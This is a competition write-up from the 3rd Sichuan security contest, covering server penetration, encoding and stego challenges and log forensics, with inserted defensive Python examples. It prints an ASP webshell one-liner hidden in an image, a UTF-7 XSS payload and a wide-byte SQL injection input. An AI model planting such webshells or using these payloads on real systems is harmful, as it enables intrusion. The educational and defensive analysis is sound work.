Write-up of the 3rd Sichuan Information Security Technology Competition

Source: Internet
Author: User
Tags: sha1, encryption

This was also the last time I took part in the provincial competition.

After all, the future competition slots will be reserved for the younger students ~


---------------------------------------------------------------------------------------------------------------------

Time: May 21, morning to afternoon

Location: CUIT (Chengdu University of Information Technology)

Contestants: (CUIT Team1) blu3boy, casperkid, hmlttrack (the people in this write-up)

(CUIT Team2) littlefater, vccjis, xiangshen

39 other teams from other colleges (117 people)

Because the penetration questions carry such a heavy weight in this competition,

each of our school's teams was assembled as 2 penetration players + 1 reverse-engineering player.
Competition introduction:

The computer used for this competition is brought by the contestants themselves.

The challenges were provided by NSFOCUS (lvmeng technology), 200 points in total

1. Theoretical question 50 points

All multiple-choice questions

Sniffing-Principle

Scan-principles

Cryptographic algorithm-DES Principle

Firewall-concept and Configuration

Reverse Engineering-shelling Application

Buffer overflow-Principle

Denial of Service Attack-Principles of SYN flood, smurf, ping flood, Teardrop and LAND attacks

Malicious Code-principles and features of Trojans, viruses, worms, and malicious code on webpages

SQL Injection-Application

Principles of network spoofing-IP Address Spoofing

Log cleanup-Windows, linux

Operating system vulnerabilities-Windows and linux

Operating system security policy configuration-Windows and linux

Network device attack and Security Configuration-routers, switches, etc.

Commonly used DOS commands-ping, nslookup, tracert, etc.

2. Practical questions 50 points

Six categories, with keys submitted online:

Basic

Web Security

OS

Crack (cracking)

Overflow

Prog (programming)

3. Penetration questions 100 points

Penetration-testing targets

 

Bronze server environment:

OS: Windows2003

Web Server: IIS 6.0

DataBase: SQL Server 2000

Web Application: hishop5.1


Silver server environment:

OS: Windows2003

Web Server: Apache 2.x

DataBase: MYSQL

Web Application: Korean XpressEngine

Gold server environment:

OS: Debian

Let's begin

---------------------------------------------------------------------------------------------------------------------
= Morning =

(7:20 am)

Dragged myself out of bed

and got ready for today's battle.

It was still raining.

Short sleeves were too cold, so I grabbed a coat.

Then hmlttrack and I headed to the lab together.

Neither of us had any appetite; we just had some porridge in the canteen.

Got a text message from Melon Doll.

(8:10 am)

Went to the lab to borrow cddedevil's 2 GB memory stick,

which brought my machine up to 4 GB = ~

Then I gave the contestants a red dress ......

Then moved the computer to the competition venue to test the network.

(9:00 am)

Took some group photos before team check-in.

Ran into adomore from Chengdu University, then went back to the venue.

We could see that the address range assigned at our seats was a private intranet range, how nice.

So the penetration questions probably wouldn't require a reverse connection back to us,

which in turn meant there would be no intranet pivoting in the penetration questions.

(During preparation we had simulated all kinds of possible intranet scenarios... TAT ~)

I also noticed y32asm sitting behind me ~

(9:30 am)

The competition starts.

Our division of labor:

hmlttrack and I take the theory questions first,

each doing half,

while blu3boy goes straight at the bronze server penetration question.

The theory questions took about 10 minutes.

By then blu3boy had already got a webshell and escalated privileges.

(Before the competition we didn't know the exact web app version, only that it was hishop 5.x; we had even dug up a hishop 5.4 0day.)

(I had hoped to use it today to open up a gap over the other teams. Who knew it would be the lowest version, hishop 5.1... what a feeling.)

Then we started searching for the key files.

blu3boy found two key files,

and I found the bronze one.

Right from the start we shot up to 1st place = ......

 

Then blu3boy moved on to the silver server.

At first glance it was a pile of Korean web apps.

I scanned the gold server: ports 22 and 23 were open.

About five minutes later the servers were taken offline.

(It seems some teams had jumped on the penetration questions too early, and the organizers wanted everyone to do the practical questions first.)

So we had no choice but to concentrate on the practical questions.

hmlttrack mainly handled the reverse/crack/programming questions,

blu3boy mainly handled the SQL injection questions,

and I mainly handled the web security questions.

 

I don't know what they did; I only remember my own questions ~

Basic: Encoding

Just base64-decode the last part of the packet.

 

XSS left a stronger impression than Coding.

It was a UTF-7 encoding question, and I saw through it at a glance.

During the winter break before my Alibaba interview, I had been told to prepare web security knowledge,

and my mentor gave me a small task to get to know UTF-7-related techniques.

Summary of my earlier notes: http://hi.baidu.com/hackercasper/blog/item/7b0a1b8188abe5c49023d97a.html

As soon as I saw the callback and the UTF-7 BOM, I knew what to do.

It's just UTF-7 decoding.

But then I realized I had no tool at hand.

Later I remembered that spark had once sent me an XSS detection tool he wrote, XCapture, which has a UTF-7 decoding function.

Installed it and was done in no time.
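For the two encoding questions above (base64 on the packet tail, and the UTF-7 XSS with a BOM), here is a small decoder written for this write-up; it is not the author's tool nor XCapture's code. It decodes RFC 2152 UTF-7 by hand so you can see why a filter that only looks at the raw bytes never sees `<script>`: inside a `+...-` run the angle brackets are modified base64 of UTF-16BE code units. The sample values are constructed, not taken from the competition.

```python
import base64
import codecs

# UTF-7 encoding of U+FEFF: the byte-order mark that marks a payload as UTF-7.
UTF7_BOM = "+/v8-"

# Characters allowed inside a UTF-7 "+...-" shift sequence (modified base64).
_B64_CHARS = set("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/")


def decode_utf7(text):
    """Decode RFC 2152 UTF-7: ASCII passes through unchanged, while each
    '+<modified base64>-' run is base64 (no padding) of UTF-16BE code units."""
    out = []
    i, n = 0, len(text)
    while i < n:
        if text[i] != "+":
            out.append(text[i])
            i += 1
            continue
        j = i + 1
        while j < n and text[j] in _B64_CHARS:
            j += 1
        chunk = text[i + 1:j]
        if chunk == "":
            # "+-" is a literal '+'; a bare '+' before another char is kept as-is.
            out.append("+")
            i = j + 1 if (j < n and text[j] == "-") else j
            continue
        # Valid shift sequences are never 1 mod 4 long; re-add the padding
        # base64 dropped and discard the trailing (zero) bits after the last
        # whole UTF-16 code unit.
        raw = base64.b64decode(chunk + "=" * (-len(chunk) % 4))
        raw = raw[: len(raw) - (len(raw) % 2)]
        out.append(raw.decode("utf-16-be"))
        # A '-' terminates the run and is absorbed; any other char ends it and stays.
        i = j + 1 if (j < n and text[j] == "-") else j
    return "".join(out)


def decode_challenge(blob):
    """Classify and decode a challenge value: a leading UTF-7 BOM marks the
    XSS-style payload, anything else is treated as plain base64."""
    if blob.startswith(UTF7_BOM):
        return "utf-7", decode_utf7(blob[len(UTF7_BOM):])
    return "base64", base64.b64decode(blob).decode("utf-8")


def cross_check(blob):
    """The hand decoder agrees with Python's built-in utf-7 codec."""
    return decode_utf7(blob) == codecs.decode(blob.encode("ascii"), "utf-7")


# Constructed samples: the classic UTF-7 shape of a <script> tag behind a BOM,
# and a base64-wrapped flag. Neither comes from the competition.
SAMPLE_UTF7 = "+/v8-+ADw-script+AD4-alert(1)+ADw-/script+AD4-"
SAMPLE_B64 = "ZmxhZ3tjb25zdHJ1Y3RlZH0="

if __name__ == "__main__":
    print(decode_challenge(SAMPLE_UTF7))
    print(decode_challenge(SAMPLE_B64))
    print("matches stdlib codec:", cross_check(SAMPLE_UTF7))
```

The defensive takeaway is the BOM check: a browser that honours a `+/v8-` prefix (old IE did when no charset was declared) will render the decoded form, so a response filter has to decode before inspecting, or the page must declare its charset explicitly.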

 

Information Hiding was also a bit silly.

Download the image, open it in WinHex, and at the very end there is an ASP one-liner.

Content: <% execute request ("hacker") %>

Its SHA-1 (160-bit) hash is the key.

This question has little practical significance.
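The defender's version of the same trick is worth having: an upload handler that checks whether anything follows the JPEG End-Of-Image marker catches exactly this kind of script-appended image. The snippet below is an added example written for this write-up, not competition code; the tiny JPEG is constructed (header plus EOI, no real picture), and the appended one-liner is the one the question quotes. `key_for` computes the SHA-1 hex digest the question asked for.

```python
import hashlib

JPEG_SOI = b"\xff\xd8"   # Start Of Image
JPEG_EOI = b"\xff\xd9"   # End Of Image


def trailing_data_after_eoi(image):
    """Return whatever follows the last JPEG EOI marker.
    A clean JPEG ends exactly at FF D9; anything after it is foreign data.
    This is a heuristic: an embedded thumbnail or the payload itself may also
    contain FF D9, which is why rfind() is used rather than find()."""
    if not image.startswith(JPEG_SOI):
        raise ValueError("not a JPEG (missing SOI marker)")
    end = image.rfind(JPEG_EOI)
    if end == -1:
        raise ValueError("truncated JPEG (no EOI marker)")
    return image[end + len(JPEG_EOI):]


def looks_like_script(tail):
    """Cheap signature check for server-side script openers in the tail."""
    markers = (b"<%", b"<?php", b"<script")
    return any(m in tail for m in markers)


def key_for(tail):
    """The challenge key: SHA-1 (160-bit) hex digest of the appended bytes."""
    return hashlib.sha1(tail).hexdigest()


def scan_upload(image):
    """What an upload filter would record about a submitted image."""
    tail = trailing_data_after_eoi(image)
    return {
        "tail_bytes": len(tail),
        "script": looks_like_script(tail),
        "sha1": key_for(tail) if tail else None,
    }


# Constructed minimal JPEG: SOI, one APP0/JFIF segment, EOI. Not a real picture.
CLEAN_JPEG = (b"\xff\xd8"
              b"\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
              b"\xff\xd9")
ASP_ONE_LINER = b'<% execute request ("hacker") %>'   # the one-liner the question hid
TAMPERED_JPEG = CLEAN_JPEG + ASP_ONE_LINER

if __name__ == "__main__":
    print("clean:", scan_upload(CLEAN_JPEG))
    print("tampered:", scan_upload(TAMPERED_JPEG))
```

Rejecting (or re-encoding) any image with a non-empty tail is the simple mitigation; hashing the tail gives you a stable identifier to pivot on across uploads.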

 

The practical questions were really painful.

They differed from the question types listed in the original outline;

some categories from the earlier list didn't appear at all.

It felt a bit like a guessing game.

 

The "cat catches mouse" question:

according to vccjis, our teammate from Team2,

the point was to notice that the question path http://xx/3/catch/ contains "catch"

and so think of capturing packets ......

Coughing up blood all round ...... = ~

This has nothing to do with the feel of real-life security;

it's just guessing riddles the way people did in the old days ......

Continuing from the above == ~

---------------------------------------------------------------------------------------------------------------------

= Noon =

 


(12:00 pm)

Went to the staff canteen for lunch.

On the way I discussed with my teammates how to split up the remaining questions, and our ideas for penetrating the upcoming silver and gold servers.

All our pre-competition preparation had assumed there would be an intranet; instead all three servers were on public addresses, which caused all kinds of headaches.

Then I suggested we could do some sniffing from the bronze server.

Because port 22 on the gold server is SSH 1.99 (it seems only the 1.x protocol can be sniffed),

and port 23 is open too, which is telnet, clearly feasible to sniff.

After all, even though all three servers are on public addresses, they may well sit in the same C-class segment (/24), where we could sniff whatever passes by.

Finished eating quickly and went back to the venue to get fighting.
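The "SSH 1.99" remark is worth being precise about: per RFC 4253 the identification string `SSH-1.99-...` means the server speaks protocol 2 but still accepts protocol 1 clients, so it is the downgrade-capable case an auditor flags, while telnet is cleartext outright. The parser below is an added example for this write-up (not a tool from the competition): it classifies SSH banners and lists the services whose credentials would travel unprotected. The sample findings are constructed to mirror the gold server's ports 22 and 23.

```python
import re

# RFC 4253 4.2: "SSH-protoversion-softwareversion SP comments CR LF"
_BANNER = re.compile(r"^SSH-(?P<proto>[0-9.]+)-(?P<soft>\S+)(?: (?P<comment>.*))?$")


def parse_ssh_banner(line):
    """Split an SSH identification string into its parts and say which
    protocol generations the server will negotiate."""
    m = _BANNER.match(line.rstrip("\r\n"))
    if not m:
        raise ValueError("not an SSH identification string: %r" % line)
    proto = m.group("proto")
    return {
        "proto": proto,
        "software": m.group("soft"),
        "comment": m.group("comment"),
        # "1.99" is the compatibility value: SSH-2 server that still accepts SSH-1.
        "accepts_v1": proto.startswith("1."),
        "accepts_v2": proto == "1.99" or proto.startswith("2."),
    }


def audit_services(findings):
    """findings: list of (port, banner-or-service-name) pairs as a scanner
    would report them. Returns the ports whose protocol exposes logins or
    session data on the wire, with the reason."""
    weak = []
    for port, banner in findings:
        if banner.startswith("SSH-"):
            info = parse_ssh_banner(banner)
            if info["accepts_v1"]:
                weak.append((port, "ssh: still accepts protocol 1 (%s)" % info["proto"]))
        elif banner.strip().lower() == "telnet":
            weak.append((port, "telnet: cleartext"))
    return weak


# Constructed sample mirroring the write-up: 22 = SSH 1.99, 23 = telnet.
SAMPLE_FINDINGS = [(22, "SSH-1.99-OpenSSH_4.3\r\n"), (23, "telnet")]

if __name__ == "__main__":
    for port, reason in audit_services(SAMPLE_FINDINGS):
        print(port, reason)
```

On the defending side the fix for the 1.99 case is `Protocol 2` in sshd_config (or simply a modern sshd, which no longer speaks protocol 1 at all), and telnet should be replaced rather than tolerated.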

 

(12:50 pm)

Back at the lab, I found that our accounts and webshells on the bronze server had been deleted.

Probably some other team up to no good.

We just had to take it again.

Then got onto the desktop

and used a home-written ARP tool to scan for intranet IP addresses

(unlike s.exe, which scans ports over TCP, or Cain, which seems to rely on WinPcap).

The scan showed that the bronze server is isolated,

not a stepping stone to the silver or gold servers,

so no need to bother with it any further.

 

---------------------------------------------------------------------------------------------------------------------

= Afternoon =

 


(1:00 pm)

The silver and gold servers came back online.

blu3boy took the silver server (Windows 2003 + PHP),

and I took the gold server (Linux).

First we ran AWVS against the silver server, at least to map out the web path structure.

One of the paths leaked the absolute web path (my resolve was still firm).

Besides the Korean web app, the scan also turned up phpMyAdmin.

Then I ran nmap against both the silver and gold servers.

The silver server also had 1433 and 8080 open;

8080 served the default IIS html page.

But we couldn't guess the password for 1433 no matter what.

Later blu3boy tried search-type injection and wide-byte injection in quick succession.

On one page, a combined search-type + wide-byte injection seemed to respond a little.

He kept at it, but unfortunately nothing more came of it in the end ~
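Since "wide-byte injection" is the most technical item in that paragraph, here is what it means, as an added example written for this write-up (not code from the competition or the Korean web app). PHP-era code escaped quotes byte-wise with `addslashes()` and then sent the bytes to a connection whose charset was GBK; because `0xBF 0x5C` is a single valid GBK character, the escaping backslash gets swallowed into that character and the quote survives. The vulnerable builder is shown beside the hardened form, which decodes the input once at the boundary and binds it as a parameter (sqlite3 stands in for MySQL; the table and rows are constructed).

```python
import sqlite3


def addslashes(raw):
    """PHP-style addslashes applied byte-wise, as the page-era code did:
    a backslash before ' " \\ and NUL."""
    out = bytearray()
    for b in raw:
        if b in (0x27, 0x22, 0x5C, 0x00):
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def naive_query(raw):
    """VULNERABLE: builds SQL by byte concatenation, then decodes it the way a
    GBK connection would before parsing. The backslash (0x5C) can become the
    trail byte of a two-byte GBK character and stop being an escape."""
    sql = b"SELECT name FROM goods WHERE name = '" + addslashes(raw) + b"'"
    return sql.decode("gbk", errors="replace")


def unescaped_quotes(sql):
    """Count single quotes that are not preceded by a backslash after
    decoding. A well-formed statement has an even number (here: 2)."""
    return sum(1 for i, ch in enumerate(sql)
               if ch == "'" and (i == 0 or sql[i - 1] != "\\"))


def demo_db():
    """Constructed in-memory table standing in for the shop database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE goods (name TEXT)")
    conn.executemany("INSERT INTO goods VALUES (?)", [("apple",), ("pear",)])
    return conn


def safe_lookup(conn, raw):
    """HARDENED: decode the request bytes once, at the boundary, then bind the
    text as a parameter. No escaping of our own, so no charset to confuse.
    errors='replace' keeps malformed bytes from raising; use 'strict' if you
    would rather reject such input outright."""
    name = raw.decode("gbk", errors="replace")
    return conn.execute("SELECT name FROM goods WHERE name = ?", (name,)).fetchall()


# Constructed inputs: a plain apostrophe (escaping works) and the classic
# lead byte 0xBF followed by an apostrophe (escaping collapses).
ORDINARY = b"abc'"
WIDE_BYTE = b"\xbf'"

if __name__ == "__main__":
    print(naive_query(ORDINARY), unescaped_quotes(naive_query(ORDINARY)))
    print(naive_query(WIDE_BYTE), unescaped_quotes(naive_query(WIDE_BYTE)))
    conn = demo_db()
    print(safe_lookup(conn, b"apple"), safe_lookup(conn, WIDE_BYTE))
```

The odd quote count on the second line is the whole bug: the statement the database parses is no longer the one the application thought it built. Parameter binding sidesteps it, as does telling the driver the real connection charset (MySQL's `mysql_set_charset`) instead of escaping blind.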

 

(2:00 pm)

hmlttrack's 3rd crack question never got solved; the algorithm was too complicated and would take too much time,

so that one was given up in favour of the other questions.

blu3boy and I had wasted a lot of time,

so in the end I had to go back and work on the practical questions.

I did a log forensics question:

find the hacker's IP address in the log,

then 3389,

but we never did find out the password.
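The log forensics question above boils down to "which client was the attacker", and the usual way to answer it is to score each source IP on the behaviours a normal shopper doesn't show: error bursts, quote characters and comment sequences in query strings, and requests to a server-side script sitting under an upload directory. The code below is an added example for this write-up, not the competition's log or tool; it parses the IIS 6.0 W3C extended format (the bronze server's web server, hence the choice, which is an assumption about the question's log) using the `#Fields:` header, and the log excerpt is constructed.

```python
import re
from collections import defaultdict

# Constructed IIS 6.0 W3C extended log excerpt (not from the competition).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2011-05-21 09:30:00
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2011-05-21 09:30:01 10.0.0.5 GET /index.aspx - 200
2011-05-21 09:30:02 10.0.0.5 GET /shop/list.aspx cid=3 200
2011-05-21 09:31:10 10.0.0.9 GET /shop/list.aspx cid=3'%20and%201=1-- 500
2011-05-21 09:31:11 10.0.0.9 GET /shop/list.aspx cid=3'%20and%201=2-- 200
2011-05-21 09:31:15 10.0.0.9 GET /admin/login.aspx - 404
2011-05-21 09:31:16 10.0.0.9 GET /manage/login.aspx - 404
2011-05-21 09:32:40 10.0.0.9 POST /upload/images/1.asp - 200
2011-05-21 09:33:00 10.0.0.7 GET /index.aspx - 200
"""

# Quote (raw or URL-encoded), SQL comment, or boolean operator in a query string.
SUSPICIOUS_QUERY = re.compile(r"%27|'|--|%20(and|or)%20", re.I)
# A server-side script being requested from under the upload tree.
SCRIPT_UNDER_UPLOAD = re.compile(r"/upload.*\.(asp|aspx|php|jsp)$", re.I)


def parse_w3c(text):
    """Yield one dict per request line, keyed by the names in '#Fields:'.
    Directive lines start with '#'; malformed rows are skipped rather than
    aborting the whole investigation."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or not line.strip():
            continue
        values = line.split()
        if fields is None or len(values) != len(fields):
            continue
        yield dict(zip(fields, values))


def score_clients(entries):
    """Return (score per IP, reasons per IP). Weights are a judgement call:
    a script under /upload outweighs an injection probe, which outweighs a 404."""
    score = defaultdict(int)
    reasons = defaultdict(list)
    for e in entries:
        ip = e["c-ip"]
        if e["sc-status"] == "404":
            score[ip] += 1
            reasons[ip].append("404 on " + e["cs-uri-stem"])
        if SUSPICIOUS_QUERY.search(e["cs-uri-query"]):
            score[ip] += 3
            reasons[ip].append("injection-like query: " + e["cs-uri-query"])
        if SCRIPT_UNDER_UPLOAD.search(e["cs-uri-stem"]):
            score[ip] += 5
            reasons[ip].append("script under upload dir: " + e["cs-uri-stem"])
    return dict(score), dict(reasons)


def attacker_ip(text):
    """The highest-scoring client, or None if nothing looked suspicious."""
    score, _ = score_clients(parse_w3c(text))
    return max(score, key=score.get) if score else None


if __name__ == "__main__":
    score, reasons = score_clients(parse_w3c(SAMPLE_LOG))
    for ip in sorted(score, key=score.get, reverse=True):
        print(ip, score[ip])
        for r in reasons[ip]:
            print("   ", r)
    print("attacker:", attacker_ip(SAMPLE_LOG))
```

Once the IP is known, the same timestamps let you line up the web log against the Windows security log for the 3389 side of the question (logon events around the time the script under `/upload` first answered 200).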
